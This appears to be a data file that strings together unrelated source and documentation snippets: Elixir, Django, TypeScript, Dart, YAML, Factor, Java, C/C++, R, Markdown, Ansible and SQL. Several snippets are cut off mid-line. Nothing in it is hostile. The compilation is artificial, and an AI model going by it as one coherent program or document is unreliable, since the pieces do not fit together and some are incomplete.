template\n\n USAGE:\n command template [command options] [arguments...]\n\n DESCRIPTION:\n Convert gohan" +"defmodule SimpleRegistry do\n use GenServer\n\n def start_link do\n GenServer.start_link(__MODULE__, nil, name: __MODULE__)\n end\n\n def register(key) do\n GenServer.call(__MODULE__, {:register, key, self()})\n end\n\n def whereis(key) do\n GenServer.call(__MODULE__, {:whereis, key})\n end\n\n @impl GenServer\n def init(_) do\n Process.flag(:trap_exit, true)\n {:ok, %{}}\n end\n\n @impl GenServer\n def handle_call({:register, key, pid}, _, process_registry) do\n case Map.get(process_registry, key) do\n nil ->\n Process.link(pid)\n {:reply, :ok, Map.put(process_registry, key, pid)}\n\n _ ->\n {:reply, :error, process_registry}\n end\n end\n\n @impl GenServer\n def handle_call({:whereis, key}, _, process_registry) do\n {:reply, Map.get(process_registry, key), process_registry}\n end\n\n @impl GenServer\n def handle_info({:EXIT, pid, _reason}, process_registry) do\n {:noreply, deregister_pid(process_registry, pid)}\n end\n\n defp deregister_pid(process_registry, pid) do\n # We'll walk through each {key, value} item, and keep those elements whose\n # value is different to the provided pid.\n process_registry\n |> Enum.reject(fn {_key, registered_process} -> registered_process == pid end)\n |> Enum.into(%{})\n end\nend" +"# -*- coding: utf-8 -*-\n# Generated by Django 1.11.20 on 2019-04-09 21:02\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n \"\"\"\n Internalize \"converttotext\" module.\n\n Prior to this, users on production used an external module, 'convert-text'.\n Then we introduced number type formats. External modules can't run internal\n code (yet), so we made this module an internal one. But _we had to rename\n it_ because internal modules can't have hyphens in their module names.\n \"\"\"\n\n dependencies = [(\"server\", \"0001_squashed_0048_auto_20190218_2115\")]\n\n operations = [\n migrations.RunSQL(\n [\n \"\"\"\n UPDATE server_wfmodule\n SET module_id_name = 'converttotext'\n WHERE module_id_name = 'convert-text'\n \"\"\"\n ],\n elidable=True,\n )\n ]" +"\ufeff//\r\n// PLEASE NOTE\r\n//\r\n// This file is generated by a T4 script. Any changes that you make to this file will be lost.\r\n//\r\n\r\ndeclare module VRS.WebAdmin\r\n{\r\n interface WebAdminTranslatedStringsStatic\r\n {\r\n Disabled: string;\r\n PluginName: string;\r\n WA_Conflicting_Update: string;\r\n WA_Exception_Reported: string;\r\n WA_Home: string;\r\n WA_Label_Credits: string;\r\n WA_Label_Environment: string;\r\n WA_Label_Lines: string;\r\n WA_Label_Reconnect: string;\r\n WA_Label_ResetPolarPlot: string;\r\n WA_Label_WebServer: string;\r\n WA_Logout: string;\r\n WA_Lost_Contact: string;\r\n WA_Saved: string;\r\n WA_ScrollToEnd: string;\r\n WA_ScrollToTop: string;\r\n WA_Send_Failed: string;\r\n WA_Title_About: string;\r\n WA_Title_Bad: string;\r\n WA_Title_Buffered: string;\r\n WA_Title_Discarded: string;\r\n WA_Title_Log: string;\r\n WA_Title_Main: string;\r\n WA_Title_Messages: string;\r\n WA_Title_Options: string;\r\n WA_Title_PluginOptions: string;\r\n WA_Title_Queues: string;\r\n WA_Title_Sent: string;\r\n WA_Title_Status: string;\r\n WA_Title_Tracking: string;\r\n WA_Title_Upnp: string;\r\n WA_Title_VirtualRadarServer: string;\r\n WA_Title_WebAdmin: string;\r\n WA_Validation_Failed: string;\r\n WA_Value_DotNet: string;\r\n WA_Value_Mono: string;\r\n WS_Title_AircraftLookup_Log: string;\r\n }\r\n\r\n export var $$: WebAdminTranslatedStringsStatic;\r\n}" +"# 2.1.3+2\n* Prepare for upcoming change to File.openRead()\n\n# 2.1.3+1\n* Apply control flow lints.\n\n# 2.1.3\n* Apply lints.\n* Pin to Dart `>=2.0.0 <3.0.0`.\n* Use at least version `2.0.0-rc.0` of `angel_framework`.\n\n# 2.1.2+1\n* Fix a typo that prevented `Range` requests from working.\n\n# 2.1.2\n* Patch support for range+streaming in Caching server.\n\n# 2.1.1\n* URI-encode paths in directory listing. This produces correct URL's, always.\n\n# 2.1.0\n* Include support for the `Range` header.\n* Use MD5 for etags, instead of a weak ETag.\n\n# 2.0.2\n* Fixed invalid HTML for directory listings.\n\n# 2.0.1\n* Remove use of `sendFile`.\n* Add a `p.isWithin` check to ensure that paths do not escape the `source` directory.\n* Handle `HEAD` requests.\n\n# 2.0.0\n* Upgrade dependencies to Angel 2 + file@5.\n* Replace `useStream` with `useBuffer`.\n* Remove `package:intl`, just use `HttpDate` instead.\n\n# 1.3.0+1\n* Dart 2 fixes.\n* Enable optionally writing responses to the buffer instead of streaming.\n\n# 1.3.0\n* `pushState` uses `strict` mode when `accepts` is passed.\n\n# 1.3.0-alpha+2\n* Added an `accepts` option to `pushState`.\n* Added optional directory listings.\n\n# 1.3.0-alpha+1\n* ETags once again only encode the first 50 bytes" +"2-26\n> Prefer Git over SVN because branches are so cheap so it is easier to do the workflow of doing stuff in the branch then moving to master afterwards.\n> Arranging models: includes, constants, attrs, validations, relationships, `accepts_nested_attributes_for`\n> Feels good to regex the rework summarization thing.\n> Read up on replacing conditional with polymorphism. This will def help on the authorizations and differing user levels in Radiograph. Learned on how views are interpolated by Rails' AR.\n> Read up on STI vs. polymorphism on modelling inherited classes. Though I took a long time it is worth it, I think.\n> Read up on CanCan but I'm not going to use it yet. Primarily because there are not yet that many features.\n> There is such a thing as an abstract AR::Base class.\n> Model generators also create a migration\n> Delegates make methods available across models.\n> to create a table: rails generate migration CreatePosts\n> attr_accessible is so that we can't let users update values\n> Don't forget the confirm thing on the link_to when you have to delete: `link_to \"Delete\", post_path(@post), :method => :delete, :confirm => \"Are you sure?\"`\n> Active Record: Post.find(478, 1134) to get" +"pt-BR:\n about:\n title: 'Sobre REFUGE'\n p1header: 'O que \u00e9 REFUGE restrooms?'\n p1:\n first: 'Refuge Restrooms \u00e9 uma aplica\u00e7\u00e3o web que busca fornecer acesso a banheiros seguros para indiv\u00edduos transg\u00eaneros, intersexo ou n\u00e3o-conformantes de g\u00eanero. Pessoas podem procurar por banheiros por proximidade, adicionar novos lugares e tamb\u00e9m comentar e avaliar lugares existentes.'\n second: 'Nossa lideran\u00e7a \u00e9 trans e buscamos criar uma comunidade focada n\u00e3o apenas em achar acesso a banheiros seguros, mas tamb\u00e9m advogar pela seguran\u00e7a de pessoas transg\u00eaneras, intersexo ou n\u00e3o-conformantes de g\u00eanero.'\n p2header: 'Onde voc\u00eas pegaram todos esses dados?'\n p2: 'As primeiras 4500 entradas s\u00e3o gra\u00e7as ao velho banco de dados Safe2Pee. O resto do nosso banco de dados foi gerado por nossos usu\u00e1rios. Se voc\u00ea conhece um banheiro neutro ou seguro, por favor adicione ao nosso banco de dados!'\n p3header: 'Por que voc\u00eas escolheram o nome REFUGE?'\n p3: 'N\u00f3s acreditamos firmemente que todas as pessoas t\u00eam o direito de usar o banheiro com seguran\u00e7a e n\u00f3s quer\u00edamos que o nome da nossa aplica\u00e7\u00e3o tivesse um pouco da mesma dignidade que queremos dar aos nossos usu\u00e1rios. Falando de um modo simples, gostar\u00edamos de fornecer um lugar de ref\u00fagio na sua necessidade.'\n p4header: \"Qual a import\u00e2ncia dos banheiros afinal, e" +"(function () {\n\t/* global CLASS */\n\t'use strict';\n\tCLASS({\n\t\tpackage: 'com.todomvc',\n\t\tname: 'Todo',\n\t\tproperties: [\n\t\t\t'id',\n\t\t\t{ name: 'completed', type: 'Boolean' },\n\t\t\t{ name: 'text', preSet: function (_, text) { return text.trim(); } }\n\t\t],\n\t\ttemplates: [\n\t\t\tfunction toDetailHTML() {/*\n\t\t\t\t<li id=\"%%id\">\n\t\t\t\t\t<div class=\"view\">\n\t\t\t\t\t\t$$completed{className: 'toggle'}\n\t\t\t\t\t\t$$text{mode: 'read-only', tagName: 'label'}\n\t\t\t\t\t\t<button class=\"destroy\" id=\"<%= this.on('click', function () { this.parent.dao.remove(this.data); }) %>\"></button>\n\t\t\t\t\t</div>\n\t\t\t\t\t$$text{className: 'edit'}\n\t\t\t\t</li>\n\t\t\t\t<%\n\t\t\t\t\tvar toEdit = function () { DOM.setClass(this.$, 'editing'); this.textView.focus(); }.bind(this);\n\t\t\t\t\tvar toDisplay = function () { DOM.setClass(this.$, 'editing', false); }.bind(this);\n\t\t\t\t\tthis.on('dblclick', toEdit, this.id);\n\t\t\t\t\tthis.on('blur', toDisplay, this.textView.id);\n\t\t\t\t\tthis.textView.subscribe(this.textView.ESCAPE, toDisplay);\n\t\t\t\t\tthis.setClass('completed', function () { return this.data.completed; }.bind(this), this.id);\n\t\t\t\t%>\n\t\t\t*/}\n\t\t]\n\t});\n})();" +"#ifndef SLANG_CORE_TYPE_TRAITS_H\n#define SLANG_CORE_TYPE_TRAITS_H\n\nnamespace Slang\n{\n\tstruct TraitResultYes\n\t{\n\t\tchar x;\n\t};\n\tstruct TraitResultNo\n\t{\n\t\tchar x[2];\n\t};\n\n\ttemplate <typename B, typename D>\n\tstruct IsBaseOfTraitHost\n\t{\n\t\toperator B*() const { return nullptr; }\n\t\toperator D*() { return nullptr; }\n\t};\n\n\ttemplate <typename B, typename D>\n\tstruct IsBaseOf\n\t{\n\t\ttemplate <typename T>\n\t\tstatic TraitResultYes Check(D*, T) { return TraitResultYes(); }\n\t\tstatic TraitResultNo Check(B*, int) { return TraitResultNo(); }\n\t\tenum { Value = sizeof(Check(IsBaseOfTraitHost<B, D>(), int())) == sizeof(TraitResultYes) };\n\t};\n\n\ttemplate<bool B, class T = void>\n\tstruct EnableIf {};\n\n\ttemplate<class T>\n\tstruct EnableIf<true, T> { typedef T type; };\n\n\ttemplate <typename B, typename D>\n\tstruct IsConvertible\n\t{\n\t\tstatic TraitResultYes Use(B) { return TraitResultYes(); };\n\t\tstatic TraitResultNo Use(...) { return TraitResultNo(); };\n\t\tenum { Value = sizeof(Use(*(D*)(nullptr))) == sizeof(TraitResultYes) };\n\t};\n}\n\n#endif" +"import { el, setAttr, setStyle, list } from 'redom';\nimport { Overlay } from './overlay.jsx';\n\nexport class ProgressBar {\n\n constructor() {\n this.progressStyle = {width: '0%', height: '100%', overflow: 'hidden'};\n <div this='el' class='progressbar'>\n <div this='progress' style={this.progressStyle}></div>\n </div>;\n }\n\n set value(val) {\n this.progressStyle.width = (val * 100) + '%';\n setStyle(this.progress, this.progressStyle);\n }\n}\n\nexport function simpleList(parent, view, props, onUpdate) {\n return list(parent, SimpleListElement, null, {view, props, onUpdate});\n}\n\nclass SimpleListElement {\n\n constructor({view, props, onUpdate}) {\n this.el = el(view, props);\n }\n\n update(attrs) {\n if (typeof attrs === 'string') {\n this.el.textContent = attrs;\n } else {\n setAttr(this.el, attrs);\n }\n }\n}\n\nexport function infoButton(title, message) {\n return (\n <button class='info' onclick={() => Overlay.showPopup(title, <p>{message}</p>)}>\n {'\\u2139'}\n </button>);\n}" +"! Copyright (C) 2007, 2008 Phil Dawes, 2013 John Benediktsson\n! See http://factorcode.org/license.txt for BSD license.\nUSING: combinators fry io io.files io.streams.string kernel\nmake math memoize namespaces sbufs sequences sequences.private\nunicode ;\nIN: csv\n\nSYMBOL: delimiter\n\nCHAR: , delimiter set-global\n\n<PRIVATE\n\nMEMO: field-delimiters ( delimiter -- field-seps quote-seps )\n [ \"\\r\\n\" swap prefix ] [ \"\\r\\\"\\n\" swap prefix ] bi ; inline\n\nDEFER: quoted-field,\n\n: maybe-escaped-quote ( delimeter stream quoted? -- delimiter stream sep/f )\n 2over stream-read1 tuck =\n [ nip ] [\n {\n { CHAR: \\\" [ [ CHAR: \\\" , ] when quoted-field, ] }\n { CHAR: \\n [ ] } ! Error: cr inside string?\n { CHAR: \\r [ ] } ! Error: lf inside string?\n [ [ , drop f maybe-escaped-quote ] when* ]\n } case\n ] if ; inline recursive\n\n: quoted-field, ( delimiter stream -- delimiter stream sep/f )\n \"\\\"\" over stream-read-until drop % t maybe-escaped-quote ;\n\n: quoted-field ( delimiter stream -- sep/f field )\n [ quoted-field, 2nip ] \"\" make ;\n\n: ?trim ( string -- string' )\n dup length [ drop \"\" ] [\n over first-unsafe blank?\n [ drop t ] [ 1 - over nth-unsafe blank? ] if\n [ [" +"package org.gluu.oxauth.service.common;\n\nimport org.gluu.model.SimpleCustomProperty;\nimport org.gluu.model.custom.script.CustomScriptType;\nimport org.gluu.model.custom.script.conf.CustomScriptConfiguration;\nimport org.gluu.model.custom.script.type.id.IdGeneratorType;\nimport org.gluu.service.custom.script.ExternalScriptService;\n\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Named;\nimport java.util.Map;\n\n/**\n * @author gasmyr on 9/17/20.\n */\n@ApplicationScoped\n@Named(\"externalIdGeneratorService\")\npublic class ExternalIdGeneratorService extends ExternalScriptService {\n\n private static final long serialVersionUID = 1727751544454591273L;\n\n public ExternalIdGeneratorService() {\n super(CustomScriptType.ID_GENERATOR);\n }\n\n public String executeExternalGenerateIdMethod(CustomScriptConfiguration customScriptConfiguration, String appId, String idType, String idPrefix) {\n try {\n log.debug(\"Executing python 'generateId' method\");\n IdGeneratorType externalType = (IdGeneratorType) customScriptConfiguration.getExternalType();\n Map<String, SimpleCustomProperty> configurationAttributes = customScriptConfiguration.getConfigurationAttributes();\n return externalType.generateId(appId, idType, idPrefix, configurationAttributes);\n } catch (Exception ex) {\n log.error(ex.getMessage(), ex);\n saveScriptError(customScriptConfiguration.getCustomScript(), ex);\n }\n\n return null;\n }\n\n public String executeExternalDefaultGenerateIdMethod(String appId, String idType, String idPrefix) {\n return executeExternalGenerateIdMethod(this.defaultExternalCustomScript, appId, idType, idPrefix);\n }\n\n}" +"---\ntitle: Orientation Programme\ncategory: Human Resources\ndate: \"2020-03-12\"\ntags: ['orientation', 'mentor', 'welcome-kit','newcomer']\ndescription: Follow the programme to quickly adapt the employee to the Atolye15 culture and own position.\n\n---\n\n- [ ] Complete the groundwork \nPrepare the equipment and the workspace after the offer has been accepted by the candidate (laptop, mouse, keyboard, etc.)\n\n- [ ] Prepare the technical tools and the communication channels \nYou can refer to [this checklist](https://checklist.atolye15.com/checklist/newcomer-accounts-checklist)\n\n- [ ] Determine or prepare an initial project \nInclude an example project in order to introduce Atolye15 and speed up the adaptation process. \n\n- [ ] Assign a mentor \nDetermine mentor who is going to pass information and lead the way about job content. \n\n- [ ] Prepare the welcome kit \nThe content should be a surprise! \ud83d\udce6 \n\n- [ ] Say Hi \ud83d\udc4b\nThe first working day newcomer is introduced to the whole team and the welcome kit unboxes all together.\n\n- [ ] Information trip \nThe new employee stars working according to the planned schedule and acquaints with employees from different departments and gets information. They also receive the HR guide details at the same time.\n\n- [ ] Welcome on board!" +"``mtries``\n----------\n\n- Available in: DRF, Isolation Forest\n- Hyperparameter: yes\n\nDescription\n~~~~~~~~~~~\n\nUse this option to specify the number of columns to randomly select at each level. \n\nThis value defaults to -1. Valid values for this option are -2, -1, and any value >= 1. If a value other than -1 or -2 is used, then the number of variables is:\n\n- the square root of the number of columns for classification \n- p/3 for regression (where p is the number of predictors). \n\n**Note:** If ``mtries=-2``, it uses all features for DRF and IF.\n\nThe following illustrates how column sampling is implemented for DRF. For an example model using:\n\n- 100 columns\n- ``col_sample_rate_per_tree`` is 0.602\n- ``mtries`` is -1 or 7 (refers to the number of active predictor columns for the dataset)\n\nFor each tree, the floor is used to determine the number of columns that are randomly picked (for this example, (0.602*100)=60 out of the 100 columns). \n\nFor classification cases where ``mtries=-1``, the square root is randomly chosen for each split decision (out of the total 60 - for this example, (:math:`\\sqrt{100}` = 10 columns).\n\nFor regression, the floor is used for each split by default (in" +"// Copyright 2017-2020 @polkadot/metadata authors & contributors\n// SPDX-License-Identifier: Apache-2.0\n\nimport { Constants } from '../../types';\n\nimport { Metadata, TypeRegistry } from '@polkadot/types';\n\nimport rpcMetadata from '../../../Metadata/static';\nimport rpcMetadataV10 from '../../../Metadata/v10/static';\nimport fromMetadata from '../fromMetadata';\n\nfunction init (meta: string): [Constants, TypeRegistry] {\n const registry = new TypeRegistry();\n const metadata = new Metadata(registry, meta);\n\n registry.setMetadata(metadata);\n\n return [fromMetadata(registry, metadata), registry];\n}\n\ndescribe('fromMetadata', (): void => {\n it('should return constants with the correct type and value', (): void => {\n const [consts, registry] = init(rpcMetadata);\n\n expect(consts.democracy.cooloffPeriod).toBeInstanceOf(registry.createClass('BlockNumber'));\n // 3 second blocks, 28 days\n expect(consts.democracy.cooloffPeriod.toNumber()).toEqual(28 * 24 * 60 * (60 / 3));\n });\n\n // removed from session\n it('correctly handles bytes', (): void => {\n const [consts] = init(rpcMetadataV10);\n\n // 0x34 removes as the length prefix removed\n expect(consts.session.dedupKeyPrefix.toHex()).toEqual('0x3a73657373696f6e3a6b657973');\n });\n});" +"/**\n * Node Native Module for Lib Sodium\n *\n * @Author Pedro Paixao\n * @email paixaop at gmail dot com\n * @License MIT\n */\n#include \"node_sodium.h\"\n#include \"crypto_streams.h\"\n\n// Generate the binding methods for each algorithm\nCRYPTO_STREAM_DEF(salsa20)\nCRYPTO_STREAM_DEF_IC(salsa20)\nCRYPTO_STREAM_DEF(xsalsa20)\nCRYPTO_STREAM_DEF_IC(xsalsa20)\nCRYPTO_STREAM_DEF(salsa208)\nCRYPTO_STREAM_DEF(salsa2012)\nCRYPTO_STREAM_DEF(chacha20)\nCRYPTO_STREAM_DEF_IC(chacha20)\n\n// chacha_ietf uses the same key length as crypto_stream_chacha20_KEYBYTES\n// Libsodium does not define it, lets define it here so we don't get compilation errors\n// when expanding the macros\n// #define crypto_stream_chacha20_ietf_KEYBYTES crypto_stream_chacha20_KEYBYTES\n//#define crypto_stream_chacha20_ietf_NONCEBYTES crypto_stream_chacha20_IETF_NONCEBYTES\nCRYPTO_STREAM_DEF(chacha20_ietf)\nCRYPTO_STREAM_DEF_IC(chacha20_ietf)\n\n\n/**\n * Register function calls in node binding\n */\nvoid register_crypto_streams(Napi::Env env, Napi::Object exports) { \n \n METHODS(xsalsa20);\n EXPORT(crypto_stream_xsalsa20_xor_ic);\n PROPS(xsalsa20);\n \n METHODS(salsa20);\n EXPORT(crypto_stream_salsa20_xor_ic);\n PROPS(salsa20);\n \n METHODS(salsa208);\n PROPS(salsa208);\n \n METHODS(salsa2012);\n PROPS(salsa2012);\n \n METHODS(chacha20);\n EXPORT(crypto_stream_chacha20_xor_ic);\n PROPS(chacha20);\n \n METHODS(chacha20_ietf);\n EXPORT(crypto_stream_chacha20_ietf_xor_ic);\n PROPS(chacha20_ietf);\n}" +"# sympy/galgebra/manifold.py\n\n\"\"\"\nmanifold.py defines the Manifold class which allows one to create a\nvector manifold (manifold defined by vector field of coordinates in\nembedding vector space) calculate the tangent vectors and derivatives\nof tangent vectors.\n\nOnce manifold is created multivector fields can be constructed in the\ntangent space and all the geometric algebra products and derivatives\nof the multivector fields calculated.\n\nNote that all calculations are done in the embedding space. Future\nversions of the code will allow manifolds defined purely in terms of\na metric.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom itertools import combinations\nfrom os import system\nimport copy\n\nfrom sympy import trigsimp, simplify\n\nfrom sympy.galgebra.ga import MV\nfrom sympy.galgebra.debug import oprint\nfrom sympy.galgebra.ncutil import linear_expand\nfrom sympy.galgebra.printing import find_executable\n\n\ndef fct_to_str(fct_names):\n import sys\n current_file = open(sys.argv[0], 'r')\n file_str = current_file.read()\n current_file.close()\n\n if isinstance(fct_names, str):\n return fct_names\n\n fcts_str = ''\n\n for fct_name in fct_names:\n start_def = file_str.find('\\ndef ' + fct_name)\n end_def = file_str.find('\\ndef ', start_def + 5)\n start_class = file_str.find('\\nclass ', start_def + 5)\n end_def = min(end_def, start_class)\n fcts_str += file_str[start_def:end_def]\n return fcts_str\n\n\ndef VectorComponents(X, basis):\n (coefs, bases) = linear_expand(X.obj)\n cdict = {}\n for (coef, base) in zip(coefs, bases):\n cdict[str(base)] = coef\n comp = []\n for base" +"% Generated by roxygen2: do not edit by hand\n% Please edit documentation in R/scrabble.R\n\\name{scrabble_dictionary}\n\\alias{scrabble_dictionary}\n\\title{Scrabble: Dictionaries}\n\\usage{\nscrabble_dictionary(language)\n}\n\\arguments{\n\\item{language}{Character. Any of \"en\",\"es\",\"de\",\"fr\". Set to \"none\"\nif you wish to skip this step (and use \\code{words} parameter in \n\\code{scrabble_words} instead).}\n}\n\\description{\nDownload words from 4 different languages: English, Spanish, \nGerman, and French. Words will be save into the \\code{temp} directory. \nThis is an auxiliary function. You may want to use \\code{scrabble_words}\ndirectly if you are searching for the highest score words!\n}\n\\examples{\n\\dontrun{\n# For Spanish words\ndictionary <- scrabble_dictionary(\"es\")\n}\n}\n\\seealso{\nOther Scrabble: \n\\code{\\link{scrabble_points}()},\n\\code{\\link{scrabble_score}()},\n\\code{\\link{scrabble_words}()}\n}\n\\concept{Scrabble}" +"# Monitoring\n\nBy default, the KUDO Kafka Operator comes with the JMX Exporter agent enabled. It also includes a Prometheus Node Exporter sidecar container to\nexport container metrics like the disk usage of persistence volumes used by KUDO Kafka.\n\nWhen the Kafka operator is deployed with the parameter `METRICS_ENABLED=true` (which defaults to `true`) then:\n\n- Each broker bootstraps with the [JMX Exporter](https://github.com/prometheus/jmx_exporter) java agent exposing the metrics at `9094/metrics`,\n along with a [Prometheus Node Exporter](https://github.com/prometheus/node_exporter) sidecar exposing container metrics at `9096/metrics`.\n- Adds a port named `metrics` and `ne-metrics` to the Kafka Service.\n- Adds a label `kudo.dev/servicemonitor: \"true\"` for the service monitor discovery. \n- Mounts a config map with [metrics reporter](https://github.com/kudobuilder/operators/blob/master/repository/kafka/operator/templates/metrics-config.yaml) for the broker container.\n\n\n```\n$ kubectl describe svc kafka-svc\n...\nPort: metrics 9094/TCP\nTargetPort: 9094/TCP\n...\nPort: ne-metrics 9096/TCP\nTargetPort: 9096/TCP\n...\n```\n\n### Using the Prometheus Service Monitor\nTo use the prometheus service monitor, it's necessary to have installed the [prometheus operator](https://github.com/coreos/prometheus-operator) previously in the cluster.\n\nUsers can monitor the Kafka cluster using independent service monitor. Or use the one that comes with KUDO Kafka\n\n`$ kubectl kudo install kafka --instance=kafka-instance -p ADD_SERVICE_MONITOR=true`\n\nOr users can provide their own service-monitor. If Kafka is using the default" +"# Compression\n\n## Client side\nThe preferred method for configuring message compression on a client is to pass `options` when the client object is instantiated.\n\nThese two options control compression behavior:\n\n**grpc.default_compression_algorithm** (int)\n\nDefault compression algorithm for the channel, applies to sending messages.\n\nPossible values for this option are:\n- `0` - No compression\n- `1` - Compress with DEFLATE algorithm\n- `2` - Compress with GZIP algorithm\n- `3` - Stream compression with GZIP algorithm\n\n**grpc.default_compression_level** (int)\n\nDefault compression level for the channel, applies to receiving messages.\n\nPossible values for this option are:\n- `0` - None\n- `1` - Low level\n- `2` - Medium level\n- `3` - High level\n\n### Code example\n```javascript\nclient = new ExampleClient(\"example.com\", credentials.createInsecure(), {'grpc.default_compression_algorithm': 2, 'grpc.default_compression_level': 2});\n```" +"% Generated by roxygen2: do not edit by hand\n% Please edit documentation in R/whisker.R\n\\name{whisker.render}\n\\alias{whisker.render}\n\\title{Logicless templating}\n\\usage{\nwhisker.render(template, data = parent.frame(), partials = list(),\n debug = FALSE, strict = TRUE)\n}\n\\arguments{\n\\item{template}{\\code{character} with template text}\n\n\\item{data}{named \\code{list} or \\code{environment} with variables that will be used during rendering}\n\n\\item{partials}{named \\code{list} with partial templates, will be used during template construction}\n\n\\item{debug}{Used for debugging purposes, likely to disappear}\n\n\\item{strict}{\\code{logical} if \\code{TRUE} the seperation symbol is a \".\" otherwise a \"$\"}\n}\n\\value{\n\\code{character} with rendered template\n}\n\\description{\nLogicless templating\n}\n\\note{\nBy default whisker applies html escaping on the generated text. \nTo prevent this use \\{\\{\\{variable\\}\\}\\} (triple) in stead of \n\\{\\{variable\\}\\}.\n}\n\\examples{\ntemplate <- \"Hello {{place}}!\"\nplace <- \"World\"\n\nwhisker.render(template)\n\n# to prevent html escaping use triple {{{}}}\ntemplate <- \n \"I'm escaped: {{name}}\nAnd I'm not: {{{name}}}\"\n\ndata <- list( name = '<My Name=\"Nescio&\">')\nwhisker.render(template, data)\n# I'm escaped: <My Name="Nescio&">\n# And I'm not: <My Name=\"Nescio&\">\n}" +"import React, { Component } from \"react\";\nimport browser from \"webextension-polyfill\";\nimport getShortcut from \"src/common/getShortcut\";\nimport CategoryContainer from \"./CategoryContainer\";\n\nexport default class KeyboardShortcutPage extends Component {\n constructor(props) {\n super(props);\n this.state = {\n commands: [],\n isInit: false\n };\n this.initCommands();\n }\n\n async initCommands() {\n const commands = await browser.commands.getAll();\n const rawDescription = /^__MSG_(.*)__$/;\n const convertedCommands = commands.map(command => {\n const isRawDescription = rawDescription.test(command.description);\n if (isRawDescription)\n command.description = browser.i18n.getMessage(command.description.match(rawDescription)[1]);\n return command;\n });\n\n this.setState({ commands: convertedCommands, isInit: true });\n }\n\n render() {\n const commandElements = this.state.commands.map(command => ({\n id: command.name,\n title: command.description,\n useRawTitle: true,\n captions: [],\n type: \"keyboard-shortcut\",\n shortcut: command.shortcut || \"\",\n defaultValue: getShortcut(command.name)\n }));\n\n const shortcutCategory = {\n category: \"\",\n elements: [\n {\n id: \"keyboard\",\n title: \"keyboardShortcutsLabel\",\n captions: [\"setKeyboardShortCutsMessage\"],\n type: \"none\",\n childElements: commandElements\n }\n ]\n };\n\n return (\n <div>\n <p className=\"contentTitle\">{browser.i18n.getMessage(\"keyboardShortcutsLabel\")}</p>\n <hr />\n {this.state.isInit && <ul>{<CategoryContainer {...shortcutCategory} />}</ul>}\n </div>\n );\n }\n}" +"============\nDomain model\n============\n\nThe different entities in a model reference each other, and input data must\nthus be entered in the correct order. This list show the correct order and\ndependencies. Entities with a higher indentation depend on entities with\nless indentation.\n\nStart populating the entities at the top of the list and work your way down.\n\n| :doc:`customers` (references itself)\n| :doc:`setup-matrices`\n| :doc:`skills`\n| :doc:`calendars`\n| :doc:`Calendar bucket <calendars>` (references calendars)\n| :doc:`locations` (references calendars and itself)\n| :doc:`suppliers` (references calendars and itself)\n| :doc:`resources` (references setup matrices, calendars, locations and itself)\n| :doc:`items` (references itself)\n| :doc:`operations` (references items, locations and customers)\n| :doc:`sales-orders` (references items, customers, operations, locations and itself)\n| :doc:`buffers` (references items, locations, calendars and itself)\n| :doc:`operation-resources` (references resources, skills and operations)\n| :doc:`operation-materials` (references items and operations)\n| :doc:`item-suppliers` (references suppliers, items, resources and locations)\n| :doc:`item-distributions` (references locations, items and resources)\n| :doc:`resource-skills` (references skills and resources)\n| :doc:`Sub operation <operations>` (references operations)\n| :doc:`manufacturing-orders` (references operations)\n| :doc:`purchase-orders` (references items, suppliers and locations)\n| :doc:`distribution-orders` (references items and locations)\n| :doc:`buckets`\n| :doc:`parameters`\n\n.. image:: _images/dependencies.png\n :alt: Model dependencies\n\nNote that it is pretty straightforward to extend the data" +"---\n- set_fact:\n secret: \"{{ azure_secret | default(lookup('env','AZURE_SECRET'), true) }}\"\n tenant: \"{{ azure_tenant | default(lookup('env','AZURE_TENANT'), true) }}\"\n client_id: \"{{ azure_client_id | default(lookup('env','AZURE_CLIENT_ID'), true) }}\"\n subscription_id: \"{{ azure_subscription_id | default(lookup('env','AZURE_SUBSCRIPTION_ID'), true) }}\"\n\n- block:\n - name: Set facts about the regions\n set_fact:\n azure_regions: \"{{ _azure_regions|from_json | sort(attribute='name') }}\"\n\n - name: Set the default region\n set_fact:\n default_region: >-\n {% for r in azure_regions %}\n {%- if r['name'] == \"eastus\" %}{{ loop.index }}{% endif %}\n {%- endfor %}\n\n - pause:\n prompt: |\n What region should the server be located in?\n {% for r in azure_regions %}\n {{ loop.index }}. {{ r['displayName'] }}\n {% endfor %}\n\n Enter the number of your desired region\n [{{ default_region }}]\n register: _algo_region\n when: region is undefined" +"DROP TABLE IF EXISTS t;\nDROP TABLE IF EXISTS d;\n\nCREATE TABLE t (x Enum8('abc' = 0, 'def' = 1, 'ghi' = 2)) ENGINE = TinyLog;\nINSERT INTO t VALUES (0), (1), (2);\nSELECT * FROM t;\n\nSELECT '---';\nCREATE TABLE d (x Enum8('abc' = 0, 'def' = 1, 'xyz' = 2)) ENGINE = Distributed(test_shard_localhost, currentDatabase(), t);\nSELECT * FROM d;\nDROP TABLE d;\n\nSELECT '---';\nCREATE TABLE d (x Enum8('abc' = 0, 'def' = 1, 'xyz' = 2)) ENGINE = Distributed(test_cluster_two_shards, currentDatabase(), t);\nSELECT * FROM d;\nDROP TABLE d;\n\nSELECT '---';\nCREATE TABLE d (x Enum8('abc' = 0, 'def' = 1, 'xyz' = 2)) ENGINE = Distributed(test_cluster_two_shards_localhost, currentDatabase(), t);\nSELECT * FROM d;\nDROP TABLE d;\n\nDROP TABLE t;" +"#pragma once\n\n#include <llvm/Support/Casting.h>\n\n#include <string>\n#include <type_traits>\n\n#include \"common/macros.h\"\n#include \"execution/sql/sql.h\"\n\nnamespace terrier::execution::sql {\n\n/**\n * Base class for algebraic SQL types.\n */\nclass SqlType {\n public:\n virtual ~SqlType() = default;\n\n /** @return ID of this SQL type. */\n SqlTypeId GetId() const { return id_; }\n\n /** @return True if this SQL type is nullable. */\n bool IsNullable() const { return nullable_; }\n\n /** @return Non-nullable version of this SQL type. */\n virtual const SqlType &GetNonNullableVersion() const = 0;\n\n /** @return Nullable version of this SQL type. */\n virtual const SqlType &GetNullableVersion() const = 0;\n\n /** @return Primitive type ID for this SQL type. */\n virtual TypeId GetPrimitiveTypeId() const = 0;\n\n /** @return Name of this SQL type. */\n virtual std::string GetName() const = 0;\n\n /** @return True if this SQL type is an integer type. */\n virtual bool IsIntegral() const = 0;\n\n /** @return True if this SQL type is a floating-point type. */\n virtual bool IsFloatingPoint() const = 0;\n\n /** @return True if this SQL type is a type that supports arithmetic. */\n virtual bool IsArithmetic() const = 0;\n\n /** @return True if this SQL type equals that SQL type. */\n virtual bool Equals(const SqlType &that) const" 